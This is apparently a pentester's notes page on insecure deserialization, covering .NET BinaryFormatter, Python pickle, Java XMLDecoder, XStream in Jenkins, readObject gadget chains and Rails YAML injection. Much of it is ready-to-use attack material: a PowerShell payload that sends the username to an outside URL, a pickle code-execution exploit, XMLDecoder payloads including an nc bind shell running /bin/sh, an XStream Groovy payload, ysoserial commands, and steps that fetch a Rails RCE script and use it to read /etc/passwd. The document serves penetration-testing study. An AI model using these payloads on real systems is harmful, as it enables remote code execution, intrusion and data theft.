Insecure Deserialization

Theory

  • Serialization is a means of translating data from one form to another.

  • Used for storage or transmission of data across the network.

  • All languages have support for serialization:

    • Java

    • PHP

    • .NET

    • COM

    • Ruby

    • Python

    • All other OOP based languages.

.NET

Top Serialization Methods

  • Binary Serialization - Runtime serialization

  • XML & SOAP Serialization

  • Data Contract Serialization

Binary Serialization

  • The .NET Framework provides the BinaryFormatter class for binary serialization.

  • Most common in .NET serialization.

  • BinaryFormatter is a fast, light-weight binary serialization technique.

  • BinaryFormatter Class serializes and deserializes an object or an entire graph of connected objects, in binary format.

  • System.Runtime.Serialization.Binary.BinaryFormatter class is a serialization mechanism in the framework since version 1.0

Methodology in Identifying Vulnerability

Identify if a block of data contains .NET Binary Serialized Data.

Focus on identifying this string as Initial Signature 'AAEAAAD//////' within the application. Eg: Login pages.

Exploitation

  • Tool: ysoserial.net

  • It takes a user-specified command and wraps it in the user-specified gadget chain, then serializes these objects to stdout. When an application with the required gadgets on the classpath unsafely deserializes this data, the chain will automatically be invoked and cause the command to be executed on the application host.

  • To crack the above example: Gadget: TypeConfuseDelegate, Formatter:BinaryFormatter

  • Generate a payload using ysoserial and replace in request to server.

  • Payload for Code Exection: powershell.exe Invoke-WebRequest -URI http://<URL>/$env:UserName

Python Pickle Code Injection

Video Explaining Concept

  • Pickle is a library in python to serialize and deserialize data.

  • It allows the developer to get a string from an object and an object from a string.

  • Vulnerability arises when the user has control over the object which is deserialized.

Serialization of object is used by application to make their storage easier. If an application needs to store an instance of a class, it can use serialisation to get a string representation of this object. When the application needs to use the instance again, it will unserialise the string to get it.

  • Gain code execution if you have control over a string that is unserialised using Pickle

Identify

  • Base64 decode all Cookie values. Enable all functionality[Eg:Rememberme at Login]

  • Look for something similar to the code below.

Generate Exploit

#python2

import cPickle
import os

class Blah(object):
 def __reduce__(self):
   return (os.system,("/usr/local/bin/score b329bd51-15dd-4063-a4f0-e6b12ad0f53b",))

b=Blah()

print cPickle.dumps(b)

Replace Cookie with Exploit

  • You may need to delete other cookes( for example, if Rememberme Cookie is vulnerable)

  • Reload page, code gets executed if vulnerable. [Even if response is HTTP 500]

XMLDecoder

  • XMLDecoder is a Java class that creates object based on a XML message. If a malicious user can get an application to use arbitrary data in a call to the method readObject, she will instantly gain code execution on the server.

  • Gain code execution when an application uses XMLDecoder to parse XML and create an object from the XML message. Unserializing user-controlled data is never a good idea and should be avoided.

Exploitation

  • Identify in the responses for any usage of of XMLDecoder class.

  • Reference: Pentesterlab Excercise

  • In this excercise, the web app accepts and processes XML file.

#Custom exploit code based on application response.
--------
#Using ProcessBuilder

<java version="1.7.0_111" class="java.beans.XMLDecoder">
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="1">
    <void index="0">
    <string>/usr/bin/whoami</string>
    </void>
</array>
<void method="start" id="process"></void>
</object>
</java>


-------
#Using Runtime().exec()

<?xml version="1.0" encoding="UTF-8"?>
<java version="1.7.0_21" class="java.beans.XMLDecoder">
 <object class="java.lang.Runtime" method="getRuntime">
      <void method="exec">
      <array class="java.lang.String" length="6">
          <void index="0">
              <string>/usr/bin/nc</string>
          </void>
          <void index="1">
              <string>-l</string>
          </void>
          <void index="2">
              <string>-p</string>
          </void>
          <void index="3">
              <string>9999</string>
          </void>
          <void index="4">
              <string>-e</string>
          </void>
          <void index="5">
              <string>/bin/sh</string>
          </void>
      </array>
      </void>
 </object>
</java>

Xstream vulnerability [Jenkins : CVE-2016-0792]

Xstream is a popular deserialization library. It’s used directly by many popular apps, like the build tool, Jenkins. By sending the below payload, Jenkins will unserialize the data provided and will allow an attacker to gain code execution. Reference: https://www.contrastsecurity.com/security-influencers/serialization-must-die-act-2-xstream

The payload illustrated here relies on Groovy.

Tip

  • Change the parmeter name=<change here for each request>

#Intercept request to create an item
POST /createItem?name=test HTTP/1.0
[...]

#Payoad
<map>
  <entry>
    <groovy.util.Expando>
      <expandoProperties>
        <entry>
          <string>hashCode</string>
          <org.codehaus.groovy.runtime.MethodClosure>
            <delegate class="groovy.util.Expando"/>
            <owner class="java.lang.ProcessBuilder">
              <command>
                <string>uname</string>
                <string>-a</string>
              </command>
            </owner>
            <method>start</method>
          </org.codehaus.groovy.runtime.MethodClosure>
        </entry>
      </expandoProperties>
    </groovy.util.Expando>
    <int>1</int>
  </entry>
</map>

ObjectInput Stream using readObject ()

The root cause of this issue comes from the fact that the application uses the method readObject() on data coming from the user. Get code execution if an application uses readObject() and contain a "vulnerable" library.

Pr-requisites

  • Entry point: Call to the method readObject() using untrusted input.

  • Libraries that uses vulnerable gadgets. [ eg:Spring]

Exploitation

  • Inspect the authenticated cookie starts with the below pattern. If similar, this is a good indicator that the application uses a base64 encoded Java serialization object,

  • Create a malicious serialized object using a payload and <command> with ysoserial. Try all the payloads if you're not sure of the right one.java -jar ysoserial.jar Spring1 '<insert command>' | base64

  • Base64 encode the output and replace the cookie with this value and replay the request. Code is executed.

Rails Object Injection [CVE-2013-0156]

The idea here is to create a new action with arbitrary code in it. By default, Rails doesn't support pure YAML in a request body. But it supports XML that can embed YAML in it.

The parameter parsing code of Ruby on Rails allows applications to automatically cast values from strings to certain data types. Unfortunately the type casting code supported certain conversions which were not suitable for performing on user-provided data including creating Symbols and parsing YAML. These unsuitable conversions can be used by an attacker to compromise a Rails application.

sudo docker run -it ruby:2 /bin/bash
gem install ronin-support

curl https://gist.githubusercontent.com/postmodern/4499206/raw/a68d6ff8c1f9570a09365036aeb96f6a9fff7121/rails_rce.rb -o rails_rce.rb
ruby rails_rce.rb <URL> "<Ruby function>"
ruby rails_rce.rb <URL> "puts 'lol'"
ruby rails_rce.rb <URL> "sleep 10"
#OS Command exec
ruby rails_rce.rb <URL> '`sleep 10`'
ruby rails_rce.rb <URL> '`cat /etc/passwd public/passwords.txt`'
PreviousSQLiNextCross-Site-Scripting (XSS)

Last updated